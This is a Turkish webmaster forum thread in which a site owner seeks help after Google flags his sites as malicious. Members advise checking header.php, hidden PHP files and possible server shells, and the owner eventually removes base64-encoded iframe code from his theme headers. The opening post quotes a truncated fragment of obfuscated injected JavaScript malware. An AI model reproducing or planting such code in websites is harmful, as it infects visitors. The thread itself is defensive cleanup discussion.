• 18-09-2012, 02:13:07
    #1
    Arkadaşlar sanırım ftp ile bağlandığım bilgisayara virüs girmiş ve hesaptaki bütün sitelerim google tarafından saldırgan olarak görünüyor iframe zannettim ancak bütün dosyaları kontrol edip taramama rağmen en ufak birşey bulamadım ftpden dosyaları çekip tarattım ftp şifrelerini değiştirdim tekrar yükledim ancak sonuç değişmedi.

    Google böyle bir kod yerleştiğini söylüyor ama yok hiç biryerde napabilirim düzeltmek için..

    <script>function dow(hit){var var1=0.0086;var1+=18;return hi
    t}var var2=0.0165;var2+=16;function gel(str,shift){var sux,e
    xt,var2,len,ich,pos,cnt1,var6,var4,ret,var5,var1,cnt2,sh,var
    3,ch,ch;var var1=0.0018;var var2=4771;var2++;var var3=0.043;
    var3-=18;var var2='CYBsubfX'.substr(3,3);function aal(why,th
    y){var var4=0.0111;var4--;return thy}var2+='QDsstrr3'.substr
    (3,3);var var8=7678;if(var8<25){var var6=0.0028;if(var6!=0){
    var var5=2108;var5++}var var7={yeh:0.0022}}var var6=25;funct
    ion led(pow,nib,xis){var var9=7;var9++;return nib}var6-=9;va
    r var10=6;var10++;var var12=0.0102;if(var12!=5){var var11=0.
    021;var11--}var var1='OpulenmH'.substr(3,3);var var14=0.012;
    if(var14!=null){var var13=12;var13-=0.0027}var1+='Msgthln'.s
    ubstr(2,3);var var16=8439;if(var16<0.0142){var var15=5943;va
    r15+=0.007}var var5=40;function lar(rad,tsk,dud){var var17=1
    3;var17++;var var18=13;var18-=0.0199;return tsk}var5+=22;var
    var19=0.021;var var4='CyqfromxB'.substr(3,4);var var20=0.005
    8;var20++;var var22=0.0179;if(var22!=null){var var21=23;var2
    1--
  • 18-09-2012, 02:20:00
    #2
    ftp ye girip public htlm dışındaki klasörlerde var , misal p.php gibi
  • 18-09-2012, 02:26:37
    #3
    Eposta Aktivasyonu Gerekmekte
    Verdiğiniz koda göre bir araştırma yaptım. İlgili zararlı buradaki kaynağa göre sanırım server'daki /home dizini altında bulunuyor.

    Sunucuya shell atılmış olabilir. Sunucunuzu yöneten kişiye başvurun derim. Sunucu yönetimini siz yapıyorsanız /home dizinini kontrol edin. Sunucu ana dizinlerinde zararlı varsa önce onu temizlemek lazım.

    Linkini verdiğim kaynak sorunun çözümünde işe yarayabilir.

    İyi çalışmalar.
  • 18-09-2012, 02:37:33
    #4
    SEOPro adlı üyeden alıntı: mesajı görüntüle
    ftp ye girip public htlm dışındaki klasörlerde var , misal p.php gibi
    Malesef başka bir php dosyası bulamadım bir siteye ait bilgileri versem sizde kontrol edip örnek verebilirmisiniz ?

    exssir adlı üyeden alıntı: mesajı görüntüle
    Verdiğiniz koda göre bir araştırma yaptım. İlgili zararlı buradaki kaynağa göre sanırım server'daki /home dizini altında bulunuyor.

    Sunucuya shell atılmış olabilir. Sunucunuzu yöneten kişiye başvurun derim. Sunucu yönetimini siz yapıyorsanız /home dizinini kontrol edin. Sunucu ana dizinlerinde zararlı varsa önce onu temizlemek lazım.

    Linkini verdiğim kaynak sorunun çözümünde işe yarayabilir.

    İyi çalışmalar.
    Şimdi bakıyorum teşekkürler.

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 02:37:33 -->-> Daha önceki mesaj 02:35:25 --

    Anlatımlar yabancı olduğu için malesef pek yardımcı olamadı.Hosting sağlayıcımla iletişime geçtim şimdi bakalım onun yardımcı olabiliceği bir konu olacakmı.
  • 18-09-2012, 03:10:44
    #5
    hocam exploit yemişsin. header.php ne ya da index.php ne falan bak o kod mutlaka vardır dosyaların birinde genelde header.php ye atıyorlar. Yeterli oluyor çünkü tüm sayfaları google haliyle zararlı olarak görüyor header ya da footera koydukları zaman herneyse sen ilk önce temizle daha sonra kötü yazılım sekmesinden yeniden değerlendirme iste 1-2 güne düzelir.
  • 18-09-2012, 04:07:01
    #6
    Misafir adlı üyeden alıntı: mesajı görüntüle
    hocam exploit yemişsin. header.php ne ya da index.php ne falan bak o kod mutlaka vardır dosyaların birinde genelde header.php ye atıyorlar. Yeterli oluyor çünkü tüm sayfaları google haliyle zararlı olarak görüyor header ya da footera koydukları zaman herneyse sen ilk önce temizle daha sonra kötü yazılım sekmesinden yeniden değerlendirme iste 1-2 güne düzelir.
    Exploit yemek ne demek acaba Exploit içilmiyor muydu :P


    Lütfen PM ile irtibata geçiniz sizi bu beladan kurtarayım
  • 18-09-2012, 13:22:09
    #7
    iframe kodlarını base64 ile kodlayıp gömmüşler yeni yeni şeyler çıkarıyor namusuzlar bütün temaların headerlarına yapıştırmışlar sildim bakalım umarım düzelir.Yardımcı olan arkadaşlara şimdilik teşekkür ederim sağolun (: